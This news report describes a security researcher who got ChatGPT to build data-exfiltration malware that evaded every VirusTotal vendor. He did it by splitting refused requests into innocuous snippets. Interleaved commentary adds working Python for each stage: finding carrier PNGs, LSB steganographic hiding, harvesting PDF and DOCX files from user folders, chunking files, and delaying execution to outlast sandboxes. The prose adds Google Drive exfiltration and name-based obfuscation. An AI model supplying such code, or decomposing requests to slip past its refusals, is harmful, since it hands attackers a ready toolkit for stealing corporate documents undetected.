A Forcepoint security researcher says he used ChatGPT to develop a zero-day exploit that evaded detection when uploaded to VirusTotal.
This means that sophisticated and usually very expensive attacks of this kind, once primarily the preserve of nation-states and APT groups, are now far more accessible to any would-be cybercriminal with access to the AI, provided they can game the engine into doing what's needed.
For this exercise in malware development, Forcepoint's Aaron Mulgrew, a self-described novice, didn't write any code himself but used advanced techniques including steganography, which hides data inside another file, usually an image. This allows crooks to bypass defense tools and steal sensitive data.
Because the chatbot’s guardrails prevent it from answering any prompt that includes “malware,” developing a new exploit required some creativity, and it took Mulgrew only two attempts to completely evade detection. Mulgrew says producing the attack took “only a few hours.”
“The equivalent time taken without an AI based Chatbot, I would estimate could take a team of 5 – 10 malware developers a few weeks, especially to evade all detection based vendors,” he wrote.
The targets of the theoretical zero-day would be corporate users holding high-value documents on the C: drive, ripe for exfiltration.
Since he couldn’t simply ask ChatGPT to write malware, Mulgrew asked the chatbot to write small snippets that he could manually stitch together, and used steganography for exfiltration. To this end, his first prompt was to ask the AI to generate code that searched for a PNG larger than 5MB on the local disk.
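The article doesn't reproduce the generated code, but the first step, finding a sufficiently large PNG on the local disk, amounts to a simple filesystem walk. A minimal sketch in Python (the function name and threshold parameter are illustrative, not Mulgrew's actual snippet):

```python
import os

def find_large_png(root, min_bytes=5 * 1024 * 1024):
    """Walk a directory tree and return the first PNG larger than min_bytes."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(".png"):
                path = os.path.join(dirpath, name)
                try:
                    if os.path.getsize(path) > min_bytes:
                        return path
                except OSError:
                    continue  # unreadable file, skip it
    return None
```

Any image over the threshold works as a carrier; the exact file doesn't matter, only that it has enough pixel data to hide a payload in.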
“The design decision here was that a 5MB PNG would easily be large enough to store a fragment of a high value business sensitive document such as a PDF or DOCX,” Mulgrew wrote.
Next, he asked ChatGPT to encode the PNG file with steganography. That worked, too, with the AI calling on Auyer’s Steganographic Library to do the job.
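Auyer's library is a Go package, and the article doesn't show the generated code, but the underlying idea, least-significant-bit (LSB) steganography, is standard: each bit of the payload replaces the lowest bit of a carrier byte (in practice, a pixel color channel), changing the image imperceptibly. A toy sketch of the technique over raw bytes, purely for illustration:

```python
def lsb_embed(carrier, payload):
    """Hide each payload bit in the least-significant bit of a carrier byte."""
    bits = []
    for byte in payload:
        for i in range(7, -1, -1):  # most-significant bit first
            bits.append((byte >> i) & 1)
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for payload")
    out = bytearray(carrier)
    for idx, bit in enumerate(bits):
        out[idx] = (out[idx] & 0xFE) | bit  # clear LSB, set payload bit
    return out

def lsb_extract(carrier, n_bytes):
    """Recover n_bytes previously hidden by lsb_embed."""
    out = bytearray()
    for i in range(n_bytes):
        byte = 0
        for bit_idx in range(8):
            byte = (byte << 1) | (carrier[i * 8 + bit_idx] & 1)
        out.append(byte)
    return bytes(out)
```

Because only the lowest bit of each byte changes, a carrier needs eight bytes of pixel data per payload byte, which is why Mulgrew wanted a carrier PNG far larger than the documents being hidden.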
To find the high-value documents to steal, Mulgrew asked the AI to write code that iterates over the User’s Documents, Desktop, and AppData folders and locates any PDF documents or DOCX documents with a maximum size of 1MB — this ensures that the entire document can be embedded into a single image and, hopefully, smuggled out without raising any alarms.
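That document-discovery step is again a straightforward directory walk with an extension and size filter. A hedged sketch (folder paths and the 1MB cap are taken from the article's description; the function itself is illustrative):

```python
import os

def find_small_documents(folders, max_bytes=1024 * 1024):
    """Yield PDF/DOCX files no larger than max_bytes under the given folders."""
    for folder in folders:
        for dirpath, _dirnames, filenames in os.walk(folder):
            for name in filenames:
                if name.lower().endswith((".pdf", ".docx")):
                    path = os.path.join(dirpath, name)
                    try:
                        if os.path.getsize(path) <= max_bytes:
                            yield path
                    except OSError:
                        continue
```

In the scenario described, the folder list would be the user's Documents, Desktop, and AppData directories, e.g. `os.path.expanduser("~/Documents")`.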
Additionally, Mulgrew says he decided on Google Drive for exfiltration because Google is usually “allow listed” on corporate networks.
“Combining the snippets using a prompt was surprisingly the easiest part, as I simply needed to post the code snippets I had managed to get ChatGPT to generate and combine them together,” he wrote.
However, since most high-value documents worth stealing will likely be larger than 1MB, Mulgrew asked ChatGPT to write code that splits a PDF into 100KB pieces and generates the phony images accordingly. This took “four or five prompts,” he noted.
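Splitting a file into fixed-size pieces is a few lines of I/O. A minimal sketch of the chunking step (the naming scheme for the pieces is an assumption; the article doesn't describe it):

```python
def split_file(path, chunk_bytes=100 * 1024):
    """Split a file into chunk_bytes-sized pieces; return the chunk paths."""
    chunks = []
    with open(path, "rb") as src:
        index = 0
        while True:
            data = src.read(chunk_bytes)
            if not data:
                break
            chunk_path = f"{path}.part{index:03d}"
            with open(chunk_path, "wb") as dst:
                dst.write(data)
            chunks.append(chunk_path)
            index += 1
    return chunks
```

Each 100KB piece is then small enough to hide in its own carrier image, so a large document goes out as a series of innocuous-looking PNGs.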
The first time Mulgrew uploaded the AI-generated malware to VirusTotal, five vendors flagged the code as malicious. In the interest of bypassing all of the security tools and creating a true zero-day, Mulgrew had to make a couple more tweaks.
First, he asked ChatGPT to create its own LSB steganography function instead of calling the external Auyer’s library. “This dropped the number of detections to two vendors, but not quite the golden number of zero vendors marking the file as malicious,” Mulgrew said.
The remaining two vendors included a “leading sandbox” and one that performs static analysis on executables. To bypass the first, he then asked ChatGPT to delay the start by two minutes — some sandboxes have a built-in timeout. And for the second, he asked the chatbot to change all the variables to random English first and last names, which effectively obfuscates the code.
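The sandbox-evasion trick relies on the fact that automated analysis environments typically give up after a short, fixed observation window. A trivial sketch of the idea (the two-minute figure comes from the article; the function is illustrative):

```python
import time

SANDBOX_DELAY_SECONDS = 120  # per the article, some sandboxes time out before two minutes

def delayed_start(task, delay=SANDBOX_DELAY_SECONDS):
    """Sleep past a typical sandbox timeout before running the real task."""
    time.sleep(delay)
    return task()
```

Since the sandbox stops watching before the sleep ends, it only ever observes a program that does nothing. Defenders counter this by patching out sleep calls or fast-forwarding the clock, which is why it only fooled some of the vendors' tooling.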
Again, ChatGPT recognizes prompts such as “obfuscate the code to avoid detection” as illegal and unethical, and refuses them, so would-be attackers have to get creative with this one.
After making these changes, Mulgrew once again uploaded the malware to VirusTotal and got the green circle result: zero vendors flagged the file as malicious. ®